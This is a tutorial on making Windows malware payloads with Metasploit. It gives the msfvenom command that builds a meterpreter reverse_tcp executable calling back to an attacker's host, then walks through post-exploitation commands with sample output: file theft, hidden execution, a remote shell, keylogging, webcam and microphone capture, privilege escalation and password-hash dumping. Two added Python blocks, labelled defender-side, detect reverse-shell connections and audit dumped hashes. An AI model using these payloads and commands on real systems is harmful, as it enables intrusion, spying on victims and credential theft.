Not every application we use on Windows is safe. Sometimes the application (EXE file) we run to open or install something has been combined with a malicious payload.
Once the malicious payload is installed on our computer, our system is compromised and the hacker can gain access to it in a matter of time.
Here, in this session, we are going to see how hackers create malicious payloads with Metasploit and meterpreter/reverse_tcp.
windows/meterpreter/reverse_tcp is typically used in two different ways.
First, it is typically used as a payload for an exploit. Here's how to do that:
In msfconsole, select an exploit module.
Configure the options for that exploit.
Do: set payload windows/meterpreter/reverse_tcp
Set the LHOST option, which is the IP that the payload should connect back to.
Do: exploit
If the exploit is successful, it should execute that payload.
Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, you would want to do it with msfvenom. If you are old school, you have probably also heard of msfpayload and msfencode.
msfvenom is the replacement for both of those.
The following is a basic example of using msfvenom to generate windows/meterpreter/reverse_tcp as an executable:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe
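As an added, defender-side example that is not part of the original post: a reverse_tcp payload connects from the target back to LHOST:LPORT, so what a defender can observe is an outbound connection started by a freshly dropped EXE. The Python below runs two simple heuristics over constructed Sysmon-style network-connection records; the record layout, paths and addresses are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon-style network-connection records (not real telemetry);
# the field layout is an assumption made for this example.
SAMPLE_EVENTS = (
    "Image=C:\\Windows\\System32\\svchost.exe Initiated=true DestinationIp=10.0.0.5 DestinationPort=443\n"
    "Image=C:\\Users\\user\\AppData\\Local\\Temp\\payload.exe Initiated=true DestinationIp=192.0.2.10 DestinationPort=4444\n"
    "Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe Initiated=true DestinationIp=203.0.113.7 DestinationPort=443\n"
    "Image=C:\\Users\\user\\Downloads\\installer.exe Initiated=true DestinationIp=198.51.100.3 DestinationPort=8080\n"
    "Image=C:\\Windows\\System32\\lsass.exe Initiated=false DestinationIp=10.0.0.9 DestinationPort=4444\n"
)

# The msfvenom example above uses LPORT=4444, the Metasploit default for reverse_tcp.
DEFAULT_MSF_PORTS = {4444}
# Prefixes of directories an ordinary user can write to, where a dropped EXE usually lands.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

RECORD = re.compile(
    r"Image=(?P<image>.+?) Initiated=(?P<init>\w+) "
    r"DestinationIp=(?P<ip>\S+) DestinationPort=(?P<port>\d+)"
)

@dataclass
class Finding:
    image: str
    ip: str
    port: int
    reasons: tuple

def parse_events(text):
    """Yield (image, initiated, ip, port) for every well-formed record."""
    for line in text.splitlines():
        m = RECORD.match(line)
        if m:
            yield m["image"], m["init"] == "true", m["ip"], int(m["port"])

def flag_reverse_shells(text):
    """Return the outbound connections that look like a reverse_tcp call-back."""
    findings = []
    for image, initiated, ip, port in parse_events(text):
        if not initiated:
            continue  # a reverse_tcp stager always connects out; ignore inbound
        reasons = []
        if port in DEFAULT_MSF_PORTS:
            reasons.append("default Metasploit port")
        if image.lower().startswith(USER_WRITABLE):
            reasons.append("image in user-writable path")
        if reasons:
            findings.append(Finding(image, ip, port, tuple(reasons)))
    return findings
```

LPORT is trivially changed, so the port rule is only a starting point; the image-path rule, ideally correlated with a file-creation event for the same EXE, holds up better.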
Important Basic Commands
pwd command
The pwd command allows you to see the current directory you're in on the remote target. Example:
meterpreter > pwd
C:\Users\user\Desktop
cd command
The cd command allows you to change directories. Example:
meterpreter > cd C:\\
meterpreter > pwd
C:\
cat command
The cat command allows you to see the content of a file:
meterpreter > cat C:\\file.txt
Hello world!
upload command
The upload command allows you to upload a file to the remote target. For example:
meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt
[*] uploading : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
[*] uploaded : /tmp/something.txt -> C:\Users\user\Desktop\something.txt
meterpreter >
The -r option for the command also allows you to upload recursively.
download command
The download command allows you to download a file from the remote target to your machine. For example:
meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/
[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt
[*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt
meterpreter >
The -r option for the command also allows you to download recursively.
search command
The search command allows you to find files on the remote file system. For example, this demonstrates how to find all text files in the current directory:
meterpreter > search -d . -f *.txt
Found 1 result...
.\something.txt (5 bytes)
Note that without the -d option, the command will attempt to search in all drives.
The -r option for the command allows you to search recursively.
ifconfig command
The ifconfig command displays the network interfaces on the remote machine:
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
...
The command ipconfig is an alias for ifconfig.
getuid command
The getuid command shows you the current user that the payload is running as:
meterpreter > getuid
Server username: WIN-6NH0Q8CJQVM\user
execute command
The execute command allows you to execute a command or file on the remote machine.
The following example will spawn a calculator:
meterpreter > execute -f calc.exe
Process 2076 created.
To pass an argument, use the -a flag:
meterpreter > execute -f iexplore.exe -a https://metasploit.com
Process 2016 created.
There are some options you can use to add more stealth. For example, you can use the -H flag to create the process hidden from view. You can also use the -m flag to execute from memory.
ps command
The ps command lists the running processes on the remote machine.
shell command
The shell command allows you to interact with the remote machine's command prompt. Example:
meterpreter > shell
Process 3576 created.
Channel 6 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>
To switch back to Meterpreter, do [CTRL]+[Z] to background the channel.
sysinfo command
The sysinfo command shows you basic information about the remote machine. Example:
meterpreter > sysinfo
Computer : WIN-6NH0Q8CJQVM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter >
keyscan_start
The keyscan_start command starts the keylogging feature on the remote machine.
keyscan_dump
The keyscan_dump command is a keylogger feature. You must use the keyscan_start command before using this. Example:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
Hello World!!
If you wish to stop sniffing, use the keyscan_stop command.
keyscan_stop
The keyscan_stop command stops the keylogger.
screenshot
The screenshot command takes a screenshot of the target machine.
webcam_list
The webcam_list command shows you a list of webcams that you can control. You'll probably want to use this first before using any other webcam commands.
webcam_snap
The webcam_snap command uses the selected webcam to take a picture.
webcam_stream
The webcam_stream command basically uses the webcam_snap command repeatedly to create the streaming effect. There is no sound.
record_mic
The record_mic command captures audio on the remote machine.
getsystem
The getsystem command attempts to elevate your privilege on the remote machine with one of these techniques:
Named pipe impersonation (in memory)
Named pipe impersonation (dropper)
Token duplication (in memory)
Example:
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
hashdump
The hashdump command allows you to dump the Windows password hashes if you have the right privileges. For example:
meterpreter > hashdump
Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4:::
root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d:::
SUPPORT_388945a0:1002:aad
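As an added, defender-side example that is not part of the original post: each hashdump line has the form user:RID:LM hash:NT hash:::, and the Guest line above shows the two well-known hashes of the empty password. The Python below parses that format and reports what an auditor would want to remediate; apart from the Guest line, the sample records and their hash values are constructed for this example.

```python
# Well-known hashes of the empty password; both appear on the Guest line above.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed hashdump output: the Guest line is copied from the example above;
# the other records and their hash values are made up for this example.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1004:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
alice:1005:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

def parse_hashdump_line(line):
    """Split one 'user:rid:lm_hash:nt_hash:::' record into its fields."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a hashdump record: {line!r}")
    return {
        "user": parts[0],
        "rid": int(parts[1]),
        "lm": parts[2].lower(),
        "nt": parts[3].lower(),
    }

def audit_hashdump(text):
    """Map each account to the findings a defender would want to act on."""
    report = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_hashdump_line(line)
        findings = []
        if rec["nt"] == EMPTY_NT:
            # The NT hash of "" means the account has no password at all.
            findings.append("blank password")
        if rec["lm"] != EMPTY_LM:
            # A real LM hash means the password is at most 14 characters and is
            # stored under the weak LM scheme; disable LM hash storage by policy.
            findings.append("LM hash stored")
        if rec["rid"] == 500:
            # RID 500 is always the built-in Administrator, whatever its name.
            findings.append("built-in Administrator account (RID 500)")
        report[rec["user"]] = findings
    return report
```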